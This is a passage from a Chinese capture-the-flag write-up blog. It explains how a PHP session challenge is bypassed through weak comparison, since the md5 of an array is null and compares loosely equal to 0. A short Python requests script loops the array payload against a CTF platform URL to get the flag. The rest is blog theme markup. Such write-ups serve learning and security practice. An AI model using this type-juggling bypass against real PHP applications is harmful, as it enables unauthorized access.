class="number">0</span>,<span class="number">25</span>)].<span class="variable">$str_rand</span>[<span class="title function_ invoke__">mt_rand</span>(<span class="number">0</span>,<span class="number">25</span>)];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;whoami&#x27;</span>]==(<span class="variable">$value</span>[<span class="number">0</span>].<span class="variable">$value</span>[<span class="number">1</span>]) &amp;&amp; <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$value</span>),<span class="number">5</span>,<span class="number">4</span>)==<span class="number">0</span>)&#123;</span><br><span class="line">  <span class="variable">$_SESSION</span>[<span class="string">&#x27;nums&#x27;</span>]++;</span><br><span class="line">  <span class="variable">$_SESSION</span>[<span class="string">&#x27;whoami&#x27;</span>] = <span class="variable">$str_rands</span>;</span><br><span class="line">  <span class="keyword">echo</span> <span class="variable">$str_rands</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;nums&#x27;</span>]&gt;=<span class="number">10</span>)&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这样的题目本地调试最好了<br>其实就是传value要等于<code>$_SESSION[&#39;whoami&#39;]</code>，而后者每次会变，但是会显示出来<br>很沙雕的一点是<code>substr(md5($value),5,4)==0</code>,通过前面<code>$value[0].$value[1]</code>我们知道value是字符串数组，数组的md5是null，和0是弱相等的~所以第一次传<code>?value[0]=e&amp;value[1]=a</code>,会返回两个字符 假设是bq 那就 <code>?value[0]=b&amp;value[1]=q</code>,十次就行，脚本写起来也简单<br>payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&#x27;http://9c132b640d22437c940c92547bb4a80f30f6958b40284a36.changame.ichunqiu.com/&#x27;</span></span><br><span class="line">session=requests.Session()</span><br><span class="line">html=session.get(url+<span class="string">&#x27;?value[]=ea&#x27;</span>).text</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    html=session.get(url+<span class="string">&#x27;?value[]=&#x27;</span>+html[<span class="number">0</span>:<span class="number">2</span>],timeout=<span class="number">2</span>).text</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;flag&#123;.*&#125;&#x27;</span> <span class="keyword">in</span> html:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(html[<span class="number">0</span>:<span class="number">2</span>])</span><br><span class="line"><span class="built_in">print</span> (html[:<span class="number">50</span>])</span><br></pre></td></tr></table></figure>


<p><img src="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/31.png" alt="img"></p>

        </article>
      </div>
    </div>
  </main>

  <section id="about" class="about-window">
  <a class="folder-backdrop" href="#"></a>
  <div class="window wide reveal" style="--delay: 140ms;">
    <div class="window-bar">
      <div class="traffic">
        <a class="traffic-dot red traffic-button" href="/" aria-label="Close"></a>
        <span class="traffic-dot yellow"></span>
        <button class="traffic-dot green traffic-button traffic-max" type="button" aria-label="Maximize"></button>
      </div>
      <div class="window-title">关于本机</div>
      <div class="window-actions">
        <a class="window-link" href="#">Close</a>
      </div>
    </div>
    <div class="window-body about-body">
      <div class="about-card">
        <div class="about-brand">
          <div class="about-logo">
            <svg viewBox="0 0 24 24" aria-hidden="true">
              <path d="M16.36 2.2c0 1.05-.43 2.06-1.15 2.8-.8.83-2.12 1.47-3.25 1.39-.13-1.11.34-2.2 1.1-2.95.75-.81 2.06-1.42 3.3-1.24z"/>
              <path d="M19.2 8.3c-.97-1.23-2.32-1.95-3.59-1.95-1.69 0-2.4.81-3.58.81-1.21 0-2.12-.79-3.6-.79-1.43 0-2.95.87-3.92 2.36-1.37 2.1-1.13 6.05 1.08 9.42.8 1.21 1.86 2.57 3.23 2.56 1.19-.01 1.53-.76 3.2-.76 1.67 0 1.98.76 3.19.75 1.41-.01 2.55-1.51 3.33-2.72.58-.89.8-1.34 1.24-2.35-3.26-1.24-3.78-5.87-.58-7.33z"/>
            </svg>
          </div>
          <div class="about-title">MacBook Pro</div>
          <div class="about-sub">16-inch, 2099</div>
        </div>
        <div class="about-specs">
          <div class="about-row">
            <span class="about-key">内存</span>
            <span class="about-val">256 GB 2667 MHz DDR4</span>
          </div>
          <div class="about-row">
            <span class="about-key">处理器</span>
            <span class="about-val">Apple M9 Pro</span>
          </div>
          <div class="about-row">
            <span class="about-key">显卡</span>
            <span class="about-val">Neural X 32-Core</span>
          </div>
          <div class="about-row">
            <span class="about-key">序列号</span>
            <span class="about-val">MACF-2099-A1B2C3</span>
          </div>
          <div class="about-row">
            <span class="about-key">系统</span>
            <span class="about-val">macOS 15.2</span>
          </div>
          <div class="about-row">
            <span class="about-key">主题作者</span>
            <span class="about-val">bkfish</span>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

  

<section id="music" class="tool-window music-window">
  <a class="folder-backdrop" href="#"></a>
  <div class="window wide reveal" style="--delay: 140ms;">
    <div class="window-bar">
      <div class="traffic">
        <a class="traffic-dot red traffic-button" href="/" aria-label="Close"></a>
        <span class="traffic-dot yellow"></span>
        <button class="traffic-dot green traffic-button traffic-max" type="button" aria-label="Maximize"></button>
      </div>
      <div class="window-title">Music</div>
      <div class="window-actions">
        <a class="window-link" href="#">Close</a>
        
      </div>
    </div>
    <div class="window-body tool-body music-body">
      
        <div class="empty-state">
          <div class="empty-title">未发现本地音乐</div>
          <div class="empty-sub">把 MP3 放在 `source/music/`（或在主题配置里设置 `desktop.music_dir`）</div>
        </div>
      
    </div>
  </div>
</section>

  <section id="search" class="search-window" data-index-url="/mac-search.json">
  <a class="folder-backdrop" href="#"></a>
  <div class="window wide reveal" style="--delay: 140ms;">
    <div class="window-bar">
      <div class="traffic">
        <a class="traffic-dot red traffic-button" href="/" aria-label="Close"></a>
        <span class="traffic-dot yellow"></span>
        <button class="traffic-dot green traffic-button traffic-max" type="button" aria-label="Maximize"></button>
      </div>
    <div class="window-title">聚焦搜索</div>
      <div class="window-actions">
        <a class="window-link" href="#">Close</a>
      </div>
    </div>
    <div class="window-body search-body">
      <div class="search-input-wrap">
        <input id="search-input" class="search-input" type="search" placeholder="搜索文章..." autocomplete="off">
        <span class="search-hint">⌘K</span>
      </div>
      <ul id="search-results" class="search-results"></ul>
      <div id="search-empty" class="search-empty">未找到结果</div>
    </div>
  </div>
</section>

  <div class="dock">
  <div class="dock-inner">
    <span class="dock-item app finder">
      <span class="dock-icon">
        <svg class="dock-svg" viewBox="0 0 24 24" aria-hidden="true">
          <path d="M4 6.5c0-1.4 1.1-2.5 2.5-2.5h11c1.4 0 2.5 1.1 2.5 2.5v11c0 1.4-1.1 2.5-2.5 2.5h-11C5.1 20 4 18.9 4 17.5z"/>
          <path d="M12 4v16"/>
          <circle cx="9" cy="10" r="1" fill="currentColor"/>
          <circle cx="15" cy="10" r="1" fill="currentColor"/>
          <path d="M8.5 14.5c1 1 2.1 1.5 3.5 1.5s2.5-.5 3.5-1.5"/>
        </svg>
      </span>
      <span class="dock-label">Finder</span>
    </span>
    <a class="dock-item app spotlight" href="#search">
      <span class="dock-icon">
        <svg class="dock-svg" viewBox="0 0 24 24" aria-hidden="true">
          <circle cx="11" cy="11" r="5.5"/>
          <path d="M15.5 15.5L20 20"/>
        </svg>
      </span>
      <span class="dock-label">聚焦搜索</span>
    </a>
    <a class="dock-item app notes" href="#notes">
      <span class="dock-icon">
        <svg class="dock-svg" viewBox="0 0 24 24" aria-hidden="true">
          <rect x="5" y="4.5" width="14" height="15" rx="2"/>
          <path d="M8 8h8M8 11.5h8M8 15h5"/>
        </svg>
      </span>
      <span class="dock-label">文章清单</span>
    </a>
    <span class="dock-item app safari">
      <span class="dock-icon">
        <svg class="dock-svg" viewBox="0 0 24 24" aria-hidden="true">
          <circle cx="12" cy="12" r="8"/>
          <path d="M12 7l2.8 5.2-5.2 2.8z"/>
        </svg>
      </span>
      <span class="dock-label">Safari</span>
    </span>
    <a class="dock-item app music" href="#music">
      <span class="dock-icon">
        <svg class="dock-svg" viewBox="0 0 24 24" aria-hidden="true">
          <path d="M9 18a2.5 2.5 0 1 0 0-5"/>
          <path d="M9 13V6l9-2v7"/>
          <path d="M16 16a2.5 2.5 0 1 0 0-5"/>
        </svg>
      </span>
      <span class="dock-label">Music</span>
    </a>
    <span class="dock-item app trash">
      <span class="dock-icon">
        <svg class="dock-svg" viewBox="0 0 24 24" aria-hidden="true">
          <path d="M6 8h12l-1 11H7z"/>
          <path d="M9 8V5h6v3M5 8h14"/>
        </svg>
      </span>
      <span class="dock-label">Trash</span>
    </span>
    <span class="dock-divider"></span>
    
    
      
      <a class="dock-item tool" href="#tool-flag">
        <span class="dock-icon">
          <span class="tool-letter">F</span>
        </span>
        <span class="dock-label">flag</span>
      </a>
    
      
      <a class="dock-item tool" href="#tool-bomb">
        <span class="dock-icon">
          <span class="tool-letter">B</span>
        </span>
        <span class="dock-label">bomb</span>
      </a>
    
      
      <a class="dock-item tool" href="#tool-sudoku">
        <span class="dock-icon">
          <span class="tool-letter">S</span>
        </span>
        <span class="dock-label">sudoku</span>
      </a>
    
  </div>
</div>


  <!-- embed resize script removed: fixed-height iframe -->
</body>
</html>
